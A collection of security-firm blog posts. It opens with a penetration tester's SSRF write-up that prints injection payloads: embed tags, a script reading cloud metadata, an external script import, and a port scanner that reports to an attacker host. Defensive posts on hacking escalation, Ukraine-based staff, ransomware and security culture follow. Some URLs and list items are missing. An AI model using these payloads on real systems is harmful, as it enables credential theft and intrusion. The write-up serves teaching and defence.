SSRF in Real Life

Now that Server-Side Request Forgery (SSRF) has finally made it onto the OWASP Top 10 you may find yourself wondering whether this is really something you should be worrying about in your apps, or if it's more of an abstract risk that's not really exploitable in the wild. Let me confirm your fears: It is absolutely something you should be worrying about, it is not at all hard to exploit, and the results generally range from "Oh, this is pretty bad..." to "Game over, man!"

Over the past couple of years, I've found SSRF in about 1/3 of the apps I've pen tested. These days it's one of the first things I look for.

Once I've gained SSRF I have an open window that can lead to your local files, your internal network, your cloud metadata, or all of the above. Depending on what I find I'll then spend a few hours browsing your Elasticsearch logs (it's funny how nobody adds authentication to Elasticsearch), seeing what I can do with your EC2 container's IAM credentials, combing through your S3 buckets I've dumped using those credentials, and generally trying to pull down any of your local files I can get ahold of.

Common Categories of SSRF

There are plenty of good resources on what SSRF is, but I've found that the examples they provide tend to be overly simplistic or not representative of what I see in the apps I test. I break down my "real life" examples into three categories:

Needless to say, these actions have to take place on the server. If the PDF conversion is taking place in the user's browser, I may get XSS, but I'm not going to get SSRF.

There are other SSRF vectors of course. Some people may ask "What about including scripts in SVGs?" Sure, that's always worth checking for, but I'm not really seeing image conversion much anymore. "What about XML External Entity (XXE)? That's basically SSRF, right?" Yeah, but I don't see XML config files much in use anymore either. (To be fair, I mainly pen test cloud-hosted SPAs with relatively modern front-end and back-end frameworks.)

Let Me GET That for You

The first general category of SSRF is the most straightforward. It occurs when a user supplies a URL, the app server pings that URL, and then returns some information about the response to the user.

SSRF Via Basic Server-Side GETs

In many of the simplistic examples you'll see in SSRF explainers, the "app" will have a GET endpoint that takes a URL as a query parameter, you supply an internal URL, and the "app" happily looks it up for you and returns the results. It seems pretty far-fetched that any app would actually do that.

Except... I did actually see that once. While doing some basic recon I stumbled across a subdomain that had a GraphQL API endpoint. It allowed full GraphQL introspection so I spent some time digging through the available GraphQL queries. I came across an "ImageProxy" query that, indeed, took a URL as a query parameter. The endpoint would issue a GET request to the supplied URL and return a base-64 encoded version of the response. For example, it was nice enough to return the ECS Task Metadata when I asked for it:{ImageProxy(url:%22http://}
SSRF example result: ECS Task Metadata returned from a GET request

SSRF via Websockets and RSS Feeds

But that's not typical. What is more common is for an app to allow a user-input webhook URL or RSS feed URL. For example, the app may send a POST request to the webhook URL whenever a new user gets created, or something along those lines. Or it'll have an in-house "RSS reader" feature.

When the user is first setting these things up, the app will usually do some sort of validity check on the user-input URL. It'll typically issue a server-side GET or POST request to the URL and prevent the user from saving the URL if it's "invalid".

Blind SSRF

In my experience the server will generally allow requests to localhost, internal endpoints, and metadata services. At the very least this usually gives me blind SSRF. For example, suppose I enter the following for my webhook URL:

The endpoint may issue a quick "Not OK" if port 22 is closed on localhost. If port 22 is open, the server may time out, or it may respond with a message that includes a banner from the response, like:

wrong status line: \"SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3\"

Okay, so technically that's not "blind SSRF", but simply returning a banner doesn't do much for me.

Full-fledged SSRF

Occasionally I get lucky and instead of a simple "OK / Not OK" the server will return the entire raw response from the URL. I recall an otherwise-very-good app that was doing this. For the webhook URL I entered:


(This is the decimal IP equivalent of AWS's metadata endpoint. The app had a filter in place that blocked the IPV4 address,, but it allowed the decimal equivalent through. PayloadsAllTheThings is an excellent resource for SSRF filter bypasses.) I clicked "Test Webhook Connection" in the app and the server promptly delivered me the AWS metadata for its EC2 instance:

Success! Response is: 200: ami-id ami-launch-index ami-manifest-path block-device-mapping/ events/ hibernation/ hostname iam/ identity-credentials/ instance-action instance-id instance-life-cycle instance-type local-hostname local-ipv4 mac metrics/ network/ placement/ product-codes profile public-keys/ reservation-id security-groups services/

These were the various instance metadata categories available. Note in particular the iam category. It turned out that this EC2 instance had an IAM role associated with it. (I find this to be the case roughly half of the time.) By drilling down through the iam path I first found the role name, then the security credentials for that role. I opened up a terminal, added those credentials to my local ~/.aws/credentials file, and used the AWS CLI to see what I could find out. It turned out that these credentials gave read access to the company's AWS Secrets Manager, which included the API keys and passwords for pretty much every service they had going.

Render Unto Hackers

The second general category of SSRF I tend to find occurs when rendering PDFs on the server. It's surprisingly common, accounting for almost half of the SSRF vectors I've found. If I see that you are rendering a PDF that includes user input, I'm immediately going to start attacking it. And honestly, it usually isn't that hard.

Typically the app will be generating some sort of report. It is not uncommon for an app to allow user-input HTML to appear in these reports. The user will see a nice WYSIWYG editor that only allows a few Markdown-type elements. But I'll hijack that request to the API and try to inject something more interesting.

SSRF via Embeds and Iframes in PDFs

My go-to element is an <embed>. If I'm just exfiltrating a single endpoint then an <iframe> will work equally well. But <embed>s tend to play nicer when it comes to formatting. And I do often need to play with styling to get the exfiltrated information to fit within the PDF document.

A typical report injection looks something like this:

    <h1>SSRF test</h1>
     <embed src="" style="width:100%;height:300px" />

The report as viewed in the browser won't show anything special. But when I click "Download", the report is rendered to PDF by the server and the AWS metadata gets embedded in the PDF version of the report:

SSRF example result: AWS EC2 Metadata embedded in PDF

No IAM role in this case. 😢

A nice thing about this category of SSRF is that, in addition to making HTTP(S) requests, I can usually embed local files as well. For example:

SSRF vector: HTML <embed> tags allowed in reports

led to the following appearing in the report's footer:

SSRF example result: Local Windows file embedded in report

Unfortunately there's no way (I know of) to list directory contents using this technique. I'll typically just use a well-known file list, include about a thousand <embed>s per chunk, and then scan through the resulting PDFs looking for hits.

SSRF Via Scripts Executed During PDF Rendering

Occasionally I'm able to inject <script> tags or event handlers on elements. That opens up a lot of possibilities, a couple of which I'll discuss below.

Including Headers in Requests

The AWS instance metadata I retrieved from the apps in the previous examples required a simple GET request. It's no problem to fetch this metadata with an <embed>. (BTW, you really, really, should either migrate to IMDSv2 or simply turn off access to the AWS EC2 metadata completely if you're not using it.)

But for apps running on a Google Cloud Platform (GCP) instance a simple GET won't cut it. To access the GCP instance metadata the following header needs to be included in the GET request:

Metadata-Flavor: Google

We can't do that with an <embed> (AFAIK) but it's easily done within a <script>:

  <div>Exfiltrated data:</div>
  <span id='result'></span>
    exfil = new XMLHttpRequest();
    exfil.onreadystatechange = function () {
      if (exfil.readyState === 4) {
        document.getElementById("result").innerText = JSON.stringify(exfil.response);
    };"GET", "");
    exfil.setRequestHeader("Metadata-Flavor", "Google");

In this particular case I was able to inject <script>s in the "Education - Notes" section of the PDF report:

SSRF example result: AWS EC2 IAM hostname embedded in report

From the GCP instance metadata I was able to grab SSH keys, Kubernetes config files, credentials for a service account, and other fun stuff. And with the service account credentials I then had read access to all of their storage buckets, among other things.

Importing a Script File

Uploading malicious payloads to the app can become tiresome after a while, especially when you have to deal with space limitations or escaping special characters. That's when it's nice to call out to an external script. I usually just set up a quick Sinatra app, expose it to the internet using ngrok, and serve up my scripts that way. Or I may put the script in an S3 bucket (as in the example below), a GitHub repo, or something like that.

One app I tested was importing posts from a popular social media site and including details of the posts in a PDF report. They'd forgotten to sanitize the content of the posts before rendering them in the report.

In my social media post I included some text like the following:

<img src=x onerror="document.write(`<script src=&apos;;></script>`)"/>

In this case I added an onerror event handler that over-wrote the entire document and imported my external script test_ssrf.js. (I don't particularly care for this technique of overwriting the document because it often screws up the PDF rendering process. But in this case it worked fine.)

I can then simply update my external script and click "Download report". For example, I'll open up a Burp Collaborator client and run a port scan on localhost using a script like the following (which I've borrowed from HackTricks):

// test_ssrf.js
// Port scan of localhost

const checkPort = (port) => {
  let img1 = document.createElement("img");
  img1.src = ``;

  fetch(`http://localhost:${port}`, { mode: "no-cors" }).then((res) => {
      let img = document.createElement("img");
      img.src = `${port}`;

for(let i=0; i<65535; i++) {

for(var i=1;i<10000000;i++) {

That last little for loop is just to keep the server busy while it sends me the pings:

GET /ping?port=80
GET /ping?port=443
GET /ping?port=7000
GET /ping?port=8081
GET /ping?port=9200

I'll then zero in on the various services, extracting whatever I can.

File Copypasta

The final general category of SSRF I'll discuss here is a little more nebulous than the first two. I think of it as file (or URL) fetching gone wrong. This usually takes some work to find. First I need a decent understanding of how things are working behind the scenes, on the server, and then I need to come up with ways to break the usual flow. I'll give a couple of examples. They're both pretty app-specific but still interesting to see.

SSRF via Email Attachments

An app allowed admins to send out bulk emails to the users in the admin's organization. They allowed file attachments to the emails. The file attachments were base64-encoded and added as a request parameter:

Example Burp request for adding an email attachment

I had no real reason to think that changing the email_attachments to a URL would work, but it was worth a shot. And indeed, after changing it to a Burp Collaborator URL, I received a ping:

GET / HTTP/1.1
accept-encoding: gzip,deflate
user-agent: nodemailer/4.7.0
Connection: close

So, the app was using an old version of nodemailer. It quickly became clear that the app was simply taking the user-input email_attachments string and supplying that as the path parameter in the nodemailer email attachment API.

The app was expecting data URIs. By feeding it a URL instead, nodemailer would look up the file located at the URL and attempt to attach that.

(Funny thing, it really wanted a file extension on the URL. It wouldn't include an attachment if I supplied as the URL. But when I added a fake file as a hash fragment: then it was happy to attach a .txt file that included the AWS metadata.)

And nodemailer would attach local files. Here I grabbed the app's package.json from the server:

SSRF vector: Retrieving local package.json file via an email attachment

I received it as an email attachment:

SSRF example result: package.json file received as an email attachment

Hitting the send_email endpoint with a list of well-known file paths led to some nice findings: config files, user dumps, etc.

SSRF via JIRA Import

A project management app had a migration process from JIRA. It had two SSRF vectors.

Part 1 - Blind SSRF

The first SSRF was less interesting, at least on the surface. To import from JIRA the app needed the user's JIRA Cloud URL. It was expecting a URL like but the app failed to properly validate this and in fact allowed any URL through. For example, I issued the following request to the "set up a new JIRA import" endpoint:

POST /api/jira/imports HTTP/2

  "jira_hostname": "",
  "container_id": "aaa"

And my Burp Collaborator received a ping:

GET /test/rest/api/2/project/aaa?maxResults=100 HTTP/1.1
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.12)

At this point I had blind SSRF of the sort I discussed in the first examples.

Part 2 - Full SSRF

But this got me wondering... During my legitimate imports from JIRA the app would also import any file attachments associated with my JIRA cards. The files were stored on Atlassian's servers, specified by some URLs that were attached to my JIRA cards. What I wanted to do was to change these file attachment URLs to something nefarious and see if I could trick the project management app into importing from them.

I didn't see a way to change the file attachment URLs on my JIRA cards directly. (Maybe there's a way, but I wasn't about to start "testing" Atlassian.)

But when I looked back at the Burp ping I received, above, I realized the app was trying to import JIRA cards but failing because it didn't like the response it received. Maybe I could fake the response, duplicating what JIRA would normally respond with, except modify the file attachment URLs?

It was about 5 levels deep, faking a JIRA response then receiving a new request from the app, then faking a new JIRA response, until I finally got to the app's request that asked for the file attachment URLs. And I responded to that request with something like this:

  "issues": [
      "fields": { 
        "attachment": [
            "filename": "simple-test-1.html",
            "size": 16,
            "mimeType": "text/plain",
            "content": ""

The content field here was the file attachment URL. I was asking the app to "import" the AWS metadata. Once the import went through, back in the project management app I could open the attachment and I had the server's IAM role name:

SSRF example result: AWS EC2 IAM role name included in attachment within the app

With the IAM credentials of that role I had read access (at least) to the S3 buckets associated with all sorts of file import/export functionality in the app.


What OWASP has to say about including SSRF in the new OWASP Top 10 is kind of funny:

A10:2021-Server-Side Request Forgery is added from the Top 10 community survey (#1). ...This category represents the scenario where the security community members are telling us this is important, even though it's not illustrated in the data at this time.

Well, I'm glad they decided to listen to the community, even if begrudgingly. SSRF is definitely out there, it's usually not that hard to find, and the results can be pretty devastating.

Pen testing is one of the services we offer beyond If you're interested in having us pen test your app, reach out to us!

Planning for Escalated Hacking

Many of our customers have been asking us how they should plan for escalating hacking and cybercrime activity in light of the conflict in Eastern Europe. Whether it is Russia, cybercrime gangs or other nation states operating under the cloud cover of that conflict, increased hacking is certainly something we can reasonably expect.

The TL;DR response is: if you have a good security program in place now, there isn't anything you should necessarily be changing based on this situation. If however, you are not sure you have a solid program in place, there's probably no one thing you can do - so you'd want to put a broader plan in place and you should expect that may take some time.

I realize this probably isn't what anyone wants to hear, and I will still go ahead and list some important things you can do and key references to try to be as useful as possible, but we have to be independent thinkers and stay honest - and I'm not sure the hype is helpful.

Note, if you are interested in what to for your developers in the Ukraine, we wrote a post about that.

It's Too Little, Too Late

no easy button
Is it easy?

Ironically, many of the queries about escalations came from customers whose board members started asking about security because of the conflict. Unfortunately, when the bits are flying the reality is it is too late to start building a program and putting in place the defenses you need to resist escalated hacking conditions.

There is no "one thing" you can do to prevent it. There is no easy button.

It makes me wonder if the same board members were encouraging their teams to build out security programs in general. It also makes me wonder if the board members are also on the boards of the security companies they are promoting.

You can't buy a tool to eliminate your risks from cybersecurity conflict. You need to plan and execute over time to manage escalated security environments.

OK But Seriously, What Can We Do?

There are a couple of good resources I would point to on this. CISA provides information and great resources in this Shields Up page. The takeaways are largely what we would advocate as well:

Another thing you can do is look for software that you are running that CISA has identified as having been targeted by hacking campaigns: known exploited vulnerabilities. Of course, there are likely other vulnerabilities that aren't yet on that list, but this is a good starting point. Generally the action for any software you are using in this list is to disable it or to update it to a version that has a fix for the vulnerability.

In the big picture, we would normally advocate for a holistic program aligned to a major standard such as NIST 800-53 (which is what our application uses as its primary standard) and broadly speaking, that is what we feel you need to prevent issues from happening.

If this is too big, you could use our worksheet on the 21 Actions to Improve Security Today. The bottom line is there is no time like the present to make sure you are planning for escalated hacking - but you need to plan and navigate that yourself, not based on some checkbox solution.

The Elephant in the Room

The easiest way to get hacked is to leave an unpatched system online, or to have a user click on a phishing link and supply their credentials. But watering hole attacks where a themed site is set up with outrageous content to attract people and then distributes malware as they visit are also quite likely. Vigilance can help prevent or detect these types of attacks as things escalate.

On the other hand, a problem is that many large companies have deeper security problems you can't easily build a plan to mitigate. For instance, it is likely that all major companies (including say cloud providers) have sleeper intelligence agents working there as full time employees waiting for a direction to cause damage or wreak havoc. If things get very bad, disruption of major cloud services might become a strategic goal for a party that has the power to pull that off based on this latent threat. You can't prevent this with vigilance. You can have backup and alternative delivery strategies to maintain maximal business continuity, but until recently such an attack would seem so far fetched as to be not worth planning for.

Conclusion - Planning for Escalated Hacking

With each passing day I am more shocked and saddened by the events unfolding and I feel a sense that people are sensationalizing or trying to get as much out of them as they can. I'm unimpressed by the boards' new attention to cybersecurity. They should have been funding cybersecurity all this time.

The reality is, for most likely problems you should already have a solution in place. But for some, you don't and you can't. That is the reality. Security is a marathon not a sprint. The best way to plan for escalating hacking incidents is to start and maintain a broad security program.

Map credit: Ukraine - Wikipedia - By Rob984, ByStaJ - Location European nation states.svg, CC BY-SA 4.0, Link

Securing Tech Workers in Ukraine

Although most Jemurai and customers are based in the US, many customers have folks working all over the world including the Ukraine. Several customers have asked us what they should do to protect their people, information assets and otherwise prepare for potentially escalating conflict there.

Now, as a Ukrainian friend of mine was quick to point out, this is not as new a conflict as most people in the U.S. may think. So hopefully if you're in this situation, you've already identified the risk and given thought to how you think about securing your systems. And in many ways, it just raises the stakes on things you should probably already be doing as part of your security program. But we thought it made for a thought provoking exercise and decided to write up our thoughts in this blog post. Note that we are not intending to take a political position in this post, though I think we can generally say that we hope that armed conflict does not escalate - for everyone's good.

The Context

First, it is important to understand and level set on a couple of things that are true in the case of the Ukraine that are not necessarily always true:

  1. There is a history of both denial of service and deeper IT intrusions in Ukraine
  2. There is an active propaganda campaign that may be casting a wide net
  3. There is a risk of physical loss of assets
  4. The lines between government forces and civilian actors are blurry
  5. The same government and civilian actors have a history of attacking US based companies

Based on all of this context, there are some things that become more important for your organizations security - and the sections that follow cover these.

Note that even if you do not have team members in the Ukraine, it is probably also a good idea to note that CISA has been publishing information about active campaigns and the vulnerabilities that are being used in them. With general tension and adversarial behavior either increasing or being more visible, it is probably a good time to step back and think about your organization's security posture in general and make sure it is aligned to the risks out there.

CISA also provides further information and great resources in this Shields Up page.


These are the protections we identified as being very important given the context.

Business Continuity for Systems Hosted in Ukraine

Most of our customers that have a presence in the Ukraine have developers but not hosted data centers or offices with backend systems. However, if your organization has hosted data centers or offices with backend systems running, it is critical to identify these systems and make a plan for how you would run any of those backend services if the ones in Ukraine were unavailable.

We would start by making an inventory of these systems, ranking criticality and then figuring out what alternatives may be possible. This should be part of a typical business continuity or disaster recovery plan.

An additional consideration that will come up again is the possibility that the Ukraine hosted systems could be taken into possession.

Encrypt Hard Drives

Generally it is a good practice to encrypt all drives on laptops, phones, tablets, desktops and servers. This can be done with OS native software in most cases. The likelihood that a device might get lost, left behind or repossessed during a prolonged event is significant. Generally having a device encrypted is similar to a remote wipe capability - which might also be a good thing to establish so that a device can be wiped in the event it is lost.

Strong VPN

To protect against network traffic in general being rerouted and inspected, we recommend using a Virtual Private Network (VPN) for all users. It isn't 100% clear what the capabilities of various threat actors are but it is quite possible for network traffic to be rerouted during a conflict through either seizure of local network infrastructure or associated hacking exercises.

Using a VPN can protect basic traffic interception. You may also want to look at how access to production environments works and restrict it such that it has to be intermediated by an auditable command channel. For instance, using AWS Systems Manager Session Manager provides a strongly authenticated, auditable way to access your production environment. A related control is network segmentation which needs to be in place in any data center to help enforce things like least privilege and separation of duties.

Anti-malware (XDR)

In addition to the increased risk of physical loss of devices, there is a likelihood that there will be organized campaigns to win Ukraine based digital assets - including both phishing and website based malware campaigns (watering hole attacks). In other words, attackers might stand up websites with inflammatory information (from a variety of angles) and use the websites to distribute malware to visitors. To reduce the risk of malware through these channels, we recommend using an XDR product.

Strong Authentication - MFA Everywhere

Using multi-factor authentication (MFA) wherever possible, including:

Maybe the most important of these is to review your production environments for access that is governed by access keys and secrets that don't also require MFA. We want to ensure that access to cloud operational systems requires MFA - and potentially is done through auditable channels.

Many mobile device management (MDM) platforms allow for enforcement of MFA on startup and configuration management in general (eg. encrypted hard drives, etc.).

Although there are valid discussions in the infosec community about the strength of different channels for delivering MFA (SMS vs. Authenticator) the most important thing is to have MFA enabled.

In general, we prefer single sign on (SSO) to MFA. But we need to be careful about the implications of this when an SSO provider gives a long term session token when a session is established. So the devil is in the details a bit with SSO - but at a high level, make sure MFA is required for access to key assets.

Least Privilege and a Process To Deprivilege

If you have developers based in the Ukraine, they may need access to certain things and not others. Based on the elevated risk, it is very reasonable to reassess these and step back to providing access to only what they actually need.

For example, if you have two products, maybe they only need access to the one they are actively working on. Similarly, maybe it is possible to reduce access to a particular development environment and not provide access broadly to AWS resources, for instance.

Another consideration is that you may want to reduce privileges for a period of time either in general, i.e. Ukraine based devs don't need access to production for a period of time, or as a response to specific events, eg. laptop is confiscated during military exercises.

Least privilege is hard and generally under appreciated work when it comes to security - because people complain when they don't have access and it is complicated to establish strictly what access is required for a given activity. Still, time spent here reduces your attack surface in the event that a developer's access is somehow stolen.

Eliminate The Use of Local Secrets

Ideally, developers don't have credentials to production systems sitting on their laptops. Again, the risk here is that a laptop is repossessed and there are secrets on the hard drive that are accessed.

A concrete way to achieve this is to use something like aws-vault and store access keys and secrets in the keychain. Looking in local files for private keys, credentials, etc. is a way to reduce what an attacker can get at if they somehow get access to a running system and can see the file system.

Review Alerting Around IAM and Resource Provisioning

Confirm that alerting is in place to detect changes to your identity management system, whether that is AWS IAM or G Suite or JumpCloud or Okta. A common action taken by an attacker may be to establish other identities they can use in your account. You want to be able to detect this.

Another common attacker action is to create additional resources (eg. EC2 instances) that can then be used to create a lasting presence in your network. Being able to track these, say with AWS Config, or CloudTrail is another important capability.

Physical Security

Honestly, there's not a lot a small developer shop can do to ensure physical security of a team in a potential conflict zone. It may be worth offering short term relocation. Larger companies might provide more secure locations or seek paid protections but for most of our clients, this is not something they are able to think about.


In InfoSec there is an idea of a canary, which is derived from the old idea of a canary in a coal mine. The canary is basically an early warning signal that something is wrong. Although it is hard to think about, it is certainly possible that a team member could be held captive and forced to provide passwords and MFA tokens. Organizations could establish canaries, essentially otherwise harmless looking signals that the person is ok or has been compromised so that their access can be removed.

Some companies use the idea of warrant canaries to signal whether law enforcement is asking them for detailed personal information and asking them not to disclose that they have been asked.

In this scenario, a company could provide a simple check in process that if followed indicates everything is ok, but if missed triggers removal of privileges. Of course, if you do institute such a process, you would want to also establish communication channels and authentication / validation processes for reinstating privileges.

Developer Continuity

An obvious concern is developer productivity and continuity of access. The internet could go down. A laptop could be confiscated. It can be possible to provide a backup network (eg. cell phone) or process for getting a new laptop - but it is probably not possible to fully mitigate the risk of developer downtime. Therefore, we advised our customers to plan for some of this and evaluate projects that have critical contributors and important timelines - and revisit plans to see if they can be adjusted to provide better continuity. Ultimately, we see this as a case where we need to be aware of the risk and mitigate it the best that we can - but not expect to fully eliminate the risk.


For me, it feels surreal to think that we may have colleagues in conflict zones. For many of us though, that has been true for some time and it is probably something we need to include in our threat models and risk strategy. This post tried to highlight some of the specific things that maybe matter more given the types of circumstances we see developing in the Ukraine. It is intended to be an example and to provoke thought. Stay safe out there!

Map credit: Ukraine - Wikipedia - By Rob984, ByStaJ - Location European nation states.svg, CC BY-SA 4.0, Link

Ransomware Attacks and Small Businesses

Ransomware attacks are big news right now. According to US Secretary of Homeland Security Alejandro Mayorkas, ransomware attacks are up a whopping 300% over the last year. Sadly, major pipelines and meatpacking plants and their million-dollar ransoms are just two mid-2021 examples of how serious these attacks are becoming to our critical infrastructure.

However, an even more disturbing story is the growth of the ransomware industry that puts all organizations at risk. Every organization must take the threat of a ransomware attack seriously—small businesses won’t get overlooked because of their size. In fact, 50% to 70% of ransomware attacks target small and medium-sized enterprises.

The same ransomware group that attacked JBS Foods also recently attacked Sol Oriens, a small consulting firm. The hacker group has since published confidential employee data to its blog on the dark web. It also threatens future disclosures, which it declares it has a right to do because the company “did not take all necessary action to protect personal data of their employees and software developments for partner companies.”

Professional service firms, government contractors, healthcare, high-tech companies, and local governments are popular ransomware targets, but attackers can strike any type of organization. Even the Saint Elizabeth Ann Seton Catholic Church and School in Wichita, Kansas, recently became a ransomware victim.


The first step of a ransomware attack is for a bad actor to gain access to where they shouldn’t be. After that, they could attack anything from a single laptop to an entire network, even cloud services. Often they pivot from an initial entry point to an internal reconnaissance stage where they might get a foothold on many or most machines across a network.

During the attack, bad actors use ransomware code to encrypt files, data, and whatever else it can access through the compromised device. Depending on the scope of their access, they may also lock down access to a single system or an entire network. The hackers don’t have to infiltrate the entire network or access the most sensitive data to cause damage. In many cases, victims shut down other systems to protect themselves while investigating and planning the scope of their attack.

Once hackers are in control, they send the ransom note. When the ransom is paid, they’ll provide instructions on how the organization can regain access or decrypt its files. Naturally, they like their ransom paid in cryptocurrencies like Bitcoin because, in theory, it allows the recipient to remain anonymous.


Ransomware is the top malware threat SMBs face, and the costs of a ransomware attack are high. According to a 2020 survey of managed service providers (MSPs), the average ransom hacker demand from SMBs was relatively modest—around $5,600. The higher costs come from the downtime the attack inflicted on the business. For SMBs, the average cost for downtime due to a ransomware attack last year was $274,200, almost 50 times the ransom amount. And for 39% of the small businesses attacked, the downtime was extensive enough to threaten their ongoing viability.

While the average ransom demand may be modest, other surveys found that larger SMBs can get demands exceeding $100,000 and that 50% of all ransomware demands were higher than $50,000.

Ransom payments, downtime, and remediation costs can be quantified, but they aren’t the only costs. There are also costs to the company’s brand, reputation, and relationships. In many cases, client and customer data is at risk in a ransomware attack. In addition, operational disruptions also impact clients. 


Most ransomware attacks come from well-organized cyber gangs. Different ransomware organizations have different targets. Some conduct long-term sophisticated attacks against major corporations, like Colonial, with high ransom demands.

Others operate on volume. They attack smaller businesses that are easier to breach and ask for a ransom proportional to the organization’s size. Balanced against the costs of downtime, potential impact on clients, and risk of public exposure, requesting a reasonable sum increases the likelihood the SMB will pay the ransom.

Under another model, hackers infiltrate a network and sell the compromised network’s encryption key to a second group that carries out the ransomware attack. Ransomware attacks have become so commoditized that some hacker groups actually package “ransomware-as-a-service” (RaaS). Then, they sell the RaaS code to bad actors who don’t have the technical expertise to launch an attack on their own. RaaS and selling decryption keys have expanded the pool of bad actors who can conduct ransomware attacks so that every organization is now—or will soon be—a likely target.

And the ransom payments are only one revenue stream for ransomware attackers. It’s become more common for ransomware hackers to exfiltrate data and sell it on the dark web—not to mention using the data to conduct future attacks.

Bottom line: Ransom attacks are good business for hackers, and we can only expect the rate of attacks to grow.


Phishing is the most common vulnerability used by bad actors to access and lock down a company’s digital assets. They send emails with attachments or links that deliver malware when clicked. Other phishing schemes use sophisticated communication (email or text) and look-alike websites to induce employees to provide login credentials or personal information on what appears to be a legitimate website.

After phishing, the most common attack vectors are:

Once attackers gain entry to the network, they start searching for the most sensitive data. They often operate undetected for extended periods when they’re able to use real credentials. Then, when they feel they have access to enough sensitive data to cause pain, they’ll initiate the ransomware attack.


Protecting usernames and passwords is critical, as the most common attack vectors rely on human error to steal network credentials and gain access. Security policies and other steps you can take to protect credentials include:

Other security policies and software solutions to protect against ransomware attacks should address:

Of course, this is a shortlist of actions. Protecting your company against ransomware attacks requires a formal security program. The ongoing process of developing IT security policies and implementing specific security controls will continue to harden your company against a ransomware attack.


Your security program should include a ransomware incident response plan. In addition, your ongoing security training should include roleplaying a ransomware incident to ensure everyone knows what to do should an attack occur.

So, what are your options once you’ve been attacked?

Pay the ransom. Many companies take this approach to minimize the downtime and impact of the current attack. However, paying the ransom comes with risks. In some cases, companies don’t receive full access to their systems and data despite paying the ransom. In addition, there may be some legal risk to paying or facilitating the payment of a ransom. There’s also the concern that paying the ransom can lead to more attacks, both generally and of the paying company. A recent survey of organizations that paid the ransom found that 80% were victimized in a second attack.

Decrypt your files. With assistance from cybersecurity and decryption experts, you may be able to decrypt your files. However, most ransomware attacks use highly sophisticated encryption algorithms. The time and computing power needed to break them would likely be too high to undo the damage caused by the attack.

Restore files and systems from backups and/or images. A company with a comprehensive backup and disaster recovery plan should be able to restore its data and systems. This doesn’t mean an attack won’t still come with a cost— the mitigation, investigation, and recovery processes all take time. However, it does limit operational downtime and avoids the need to pay the ransom.


Too many small businesses underestimate their chances of being ransomware targets, but this is short-sighted. A small business can be an attractive target as “easy prey” or because of its relationship with a larger, more lucrative, or strategic company or government department.

Now is an excellent time to review your existing security program and IT security policies to see how well your company is defending itself against a potential ransomware attack, as well as reviewing your business continuity plans in case ransomware attackers choose you as a target.

Creating a Security Culture

Protecting your company requires a robust security program with documented policies and processes; but without consistent, thorough execution of those policies, your company isn’t actually any more secure. Program documentation, no matter how detailed or organized, doesn’t harden any targets on its own. That's why building a company culture of security is a vital part of your security program. Lack of an active security culture throughout your organization undermines its security readiness.


Security for many small businesses and start-ups may be lax because they have no program at all. Getting started building a security program is step one, but the focus can't be only on securing devices and assets. Humans remain the weakest link in cyber defense yet often receive the least attention in most security programs.

When a documented IT security policy fails, you'll often find a human element behind it. Perhaps someone was careless with a company laptop. Did an employee fall for a phishing scam? Maybe even an IT team member forgot to deactivate the credentials of a separated employee.

Acknowledging the human risk to company security isn't about blaming any individual. Instead, it's about highlighting the failure of leadership to create and reinforce a security culture that prepares its people to manage security issues. A security culture sets up an understanding of risks, norms, and expectations of behavior, reinforcing itself through action. It provides employees with knowledge and the tools to make smart security decisions in compliance with the organization's security program. And ultimately, a security culture makes critical actions and behaviors second nature to everyone in the business.

The fundamental obstacle to creating a security culture? It’s the failure to invest the resources necessary to build up security-savvy employees who understand where the risks are and make security hygiene a part of their daily responsibilities.


There are five key aspects to creating a security culture. Each has its own set of challenges, but each is necessary to create a genuine culture that becomes embedded within the organization.


Security culture must permeate an organization from top to bottom. It can't take root if employees don't see executive leaders and middle managers taking security seriously.

Senior leadership must create and support a security program with clear lines of responsibility for executing the program. It requires investing in the resources needed to educate and communicate security policies, risks, and resources to employees. It also requires setting up systems that measure compliance and encourage security behaviors.

Last, leadership must personally demonstrate the security behaviors they want to see in others. If direct managers or senior executive teams are lax, it undermines efforts to create a genuine security culture.


Limiting your efforts to passive awareness campaigns won't create a security culture. A training video for new employees who answer some questions at the end? Anyone can pass a 10-question quiz on the material they've just seen. Making security policy documentation available online? Nobody's going to read through IT security documentation even if they do sign an attestation. When was the last time you read the Terms of Service before clicking “accept”?

Employees should regularly receive security communications that educate them about

All security communications should be written in “plain English,” free from IT jargon. They should also explain risks, and potential threats in contexts employees recognize.

One challenge to creating security-minded employees is that the threat and its consequences can feel too remote. Instead of talking about abstractions like vectors and endpoints, a security communication could convey real-world scenarios. It might show how bad actors can easily trick people into sharing sensitive information, which they can then use to gain access to the company network. Design scenarios that clearly illustrate the difference between a poor security choice and a strong one, making it easy for employees to understand what's expected of them.

Don't limit yourself only to written security communications. For example, we built a series of short podcasts on security culture for IT teams. At less than five minutes each, it's content anyone can consume quickly.

Short videos, podcasts, recorded messages, and even memes can all deliver security education in ways that achieve higher engagement and retention than a written email or policy memo. When you have a library of multimedia security communications, it's easy to share a constant stream of easily digestible security awareness material.


Ongoing security training is the more formal, interactive side of communication that helps build a security culture. Some training can be self-directed through security communication materials, but it doesn't replace regular live training.

We always recommend that organizations role play a security incident to test their response plan. Employee role plays are great training opportunities without having to simulate a full-scale event, and they also focus on building confidence in employee decision-making. Role plays cover how to identify a potential security risk and how team members should respond. Using an active role play training approach sparks the "muscle memory" that helps employees recognize shades of the scenario in real life.


Cybersecurity risks can be costly and need to be taken seriously. But creating a culture of fear or blame around security isn't going to yield positive results. Similarly, teasing employees with the promise of bogus bonuses to teach them the risks of phishing doesn't create an open, positive security culture.

A negative security culture leaves employees afraid to speak up. If they make a security mistake or see something suspicious, they may feel the personal risk of raising the issue is greater than the cyber risk to the organization. Employees using an unauthorized device or application for work won't let anyone know—they'll just continue to use it. All these behaviors open vulnerabilities that your security team may never see until it's too late.

Instead, create programs that reward and recognize employees for being attentive to security. One of the benefits of creating a digital library of your security communications is that you can measure which team members engage with the content and how often. These metrics allow you to reward and recognize people for


Teach employees to think of workplace cybersecurity the same way they do about workplace safety. The workplace safety framework is a valuable model for embedding security into all areas of the company:

One of the biggest challenges here is bridging the gap between IT staff and other employees. An IT team that uses too much jargon or shows impatience with non-tech savvy employees makes it harder to bridge that gap.

If you're a small or new company without an IT department, your challenge is tasking people who can take on the role of security advisor or act as the conduit to outside resources.

The point is that each employee needs to understand that performing their duties in compliance with company security policy is their responsibility.


